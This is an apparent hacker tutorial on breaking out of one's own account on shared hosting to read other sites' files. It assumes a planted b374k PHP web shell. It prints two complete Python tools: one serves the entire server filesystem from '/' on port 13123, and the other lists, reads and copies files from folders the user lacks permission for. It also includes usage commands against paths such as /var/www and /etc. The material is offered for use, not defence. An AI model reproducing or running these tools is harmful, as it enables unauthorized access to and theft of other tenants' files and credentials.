Skip to main content

Server Bypass via Symlink - Jumping in server

==================================================

As we all know, symlinking it's on of greates methods for bypassing server security, mean to read files of other site in same shared host.
For getting success with this tutorial are required the following things:
  • Python Installed on Server
  • b374k.php shell
  • And some scripts u will see below.

This idea have start from devilzc0de geeks and let me explain how it work.


here we are in folder
/var/www/
dono and trying to go into /www/
no permissions to go into /www .
before we got tired by trying the commands u must check if if python it's installed with command :
python -h
Now take this python script and name it as
webs.py , It's a little python script who will open a new port on server SimpleHTTPServer ( python ) module. Default port from script it's 13123 .

#!/usr/bin/env python# devilzc0de.org (c) 2012import SimpleHTTPServerimport SocketServerimport osport = 13123if __name__=='__main__': os.chdir('/') Handler = SimpleHTTPServer.SimpleHTTPRequestHandler httpd = SocketServer.TCPServer(("", port), Handler) print("Now open this server on webbrowser at port : " + str(port)) print("example: http://maho.com:" + str(port)) httpd.serve_forever()
http://pastebin.com/PddvszKC

Next u wil need to run the webs.py script by following command
python webs.py

open the site with port 13123
site.com:13123








Let's go with next method of symlink server bypassing , like u see and into before post now i will explain a new trick with an other tool.
http://www.flashcrew.in/2012/05/serv...umping-in.html

-------------------------
Here we will talk about an other tool who use python permission to read other folders/ files in same server.
Tool called xplor.py and here it's the source

#!/usr/bin/env python
# devilzc0de.org (c) 2012
import sys
import os

def copyfile(source, dest, buffer_size=1024*1024):
if not hasattr(source, 'read'):
source = open(source, 'rb')
if not hasattr(dest, 'write'):
dest = open(dest, 'wb')
while 1:
copy_buffer = source.read(buffer_size)
if copy_buffer:
dest.write(copy_buffer)
else:
break
source.close()
dest.close()

if __name__=="__main__":
if not len(sys.argv) == 3 and not len(sys.argv) == 2:
sys.stdout.write('usage : python ' + os.path.basename(sys.argv[0]) + ' [path to dir/file] [path to save file]\r\n')
sys.stdout.write('ex : python ' + os.path.basename(sys.argv[0]) + ' /etc\r\n')
sys.stdout.write('ex : python ' + os.path.basename(sys.argv[0]) + ' /etc/issue\r\n')
sys.stdout.write('ex : python ' + os.path.basename(sys.argv[0]) + ' /etc/issue issue_new_copy\r\n')
sys.exit(1)

target = sys.argv[1].replace("\\","/")
if os.path.isdir(target):
if not target.endswith("/"):
target = target + "/"
dir = os.listdir(target)
for d in dir:
fs = ""
if os.path.isdir(target + d):
fs = "[ DIR ]"
elif os.path.isfile(target + d):
fs = os.path.getsize(target + d)
fs = str(fs)

sys.stdout.write(fs.rjust(12, " ") + " " + d + "\r\n")
elif os.path.isfile(target):
if len(sys.argv) == 3:
copyfile(target, sys.argv[2])
else:
f = open(target, "rb")
try:
byte = f.read(1024)
sys.stdout.write(byte)
sys.stdout.flush()
while byte != "":
byte = f.read(1024)
sys.stdout.write(byte)
sys.stdout.flush()
finally:
f.close()
else:
sys.stdout.write("Can't found file or folder : " + target)
http://pastebin.com/WqmCE2sJ


testing the script
python xplor.py

User the tool to view folders where not have any permission to read inside

python xplor.py /var/www/index.php


View the files in no access folder .
python xplor.py /var/www/index.php


copy/ save ur file
python xplor.py /var/www/indro/ketek.jpg ketek.jpg


And yeah file it's here


Yeahh fucking access it's granted

Some thing u can do with those other scripts in perl
webs.pl
and
xplor.pl

enjoy it :)

Share this with your friends
Loading...